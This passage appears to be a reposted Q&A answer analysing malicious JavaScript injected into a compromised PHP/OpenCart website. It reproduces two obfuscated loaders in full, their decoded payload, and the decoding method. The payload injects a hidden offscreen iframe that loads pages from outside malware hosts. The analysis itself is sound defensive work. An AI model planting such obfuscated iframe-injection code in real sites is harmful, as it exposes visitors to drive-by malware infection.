        f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
    }
    w = f;                           //ahh juggling w to f
    s = [];                          //preparing s to receive the decoded string
    for (i = 2 - 2; - i + 640 != 0; i += 1) {  //haha, ok: ( 2-2=0; lol; i++ )
        j = i;                       //juggle artist at it again
        if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9);  //9 offset
    }  // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
    fafa = e;                        //ok stop juggling. fafa = EVIL
    fafa(s)                          //there we go: EVIL(decoded string)
}

As one can now read, they jump through a lot of hoops to fool virus-scanners.

I re-factored this (for my understanding) to:

w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
    s += String.fromCharCode(  parseInt(w[i],16) + 9  );  //decode
}
eval(s)                                                   //execute

Using my decoder (set to base 16, separation character , and offset 9) the payload decoded to:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Note that this resulting code is indented with 2 and 3 tabs (amateur or fooling virusscan?) that I removed for readability. Also the line-endings are CR (13dec) (is the author/script-kiddie using an older MAC?).

So, now we have all the code we can (finally) simply explain what is happening:

• the PHP script curl's a visitor/website unique javascript to inject in served markup
• this (by PHP) injected javascript will inject an iframe in the document's body (gallantly aided by the browser since body doesn't exist yet), positioned -10000px from the left (out of sight) in the visited page (on the visitors browser) and
• the injected iframe loads a specifically targeted (at user and website the user is visiting) external page (containing god knows what kind of mess/malware/virus/rootkit, in my case from rotatethespin.com:8000, muruno-vaser.info:8000, epomota.com etc.).

I also verified this by getting the document's live html with this bookmarklet:

javascript:(function(){ alert(document.documentElement.innerHTML); })()

This also showed the injected iframe code in the source.

I used the next bookmarklet to move the iframe into view (assuming there is just 1 iframe):

javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()

Naturally one could also use firebug and similar tools (depending on browser).

I also noticed that when using most webbased tools (or even w3c validator) to fetch the source of the infected website, php did not insert the javascript, making the website look not infected!
I also had this 'problem' when trying a simple telnet-command to (safely) get the infected code. However after seeing the php code behind it, I realized I used to few HTTP commands (specifically the referrer).
Doing: telnet infected-site.com 80 and then pasting the following finally gave the infected markup source:

GET /path.php?page=something HTTP/1.1
Host: infected-site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Referer: http://infected-site.com/index.php
Connection: Close

Note that this way one can also safely explore (and reverse-engineer) the source of the iframe etc!!

I also noticed that the website-owner's computer also did not get the infected code! This is either because his machine is infected or because the the server that distributes the javascripts did not provide a script because it knew that client-machine was already infected.

Update: having a working set of tools in this answer, I re-checked the comprised website today (after a good night rest) and got totally different script injected (but still based on the same techniques I explained in this answer).

<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>

Note that this time the numbers are in octal (base 8) (separated by , with an offset of -4).
So I updated my decoder to include a base/radix setting (and all the depending links in this answer) and as one can see the payload is still the same (apart from the domain it points to).

---

I found this question by googling document\["\x62ody"\] ^= ~1 which gave (mostly useless/infected) 834 results.

The malware I stumbled upon today had the above string and the pretty unique string 'd21vd12v' inside it, which gives 8300 (also mostly useless/infected) results.

However googling '// This code use for global bot statistic' (found in the php you supplied in your question) rendered over 4.1 million results (dating back to at least 2010), indicating that also wordpress, joomla, etc are victim of this 'technique'.

Reading some of those links (like this, this or this) I get the impression this started out as a way to fool search-engines (like google) in order to increase page-ranking. This at the price of creating a self-inflicted malware-hole.
Naturally the variants that specialize in distributing malware now try to hide themselves from the search-engines.

这篇关于Opencart：阿贾克斯JSON响应未知字符的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！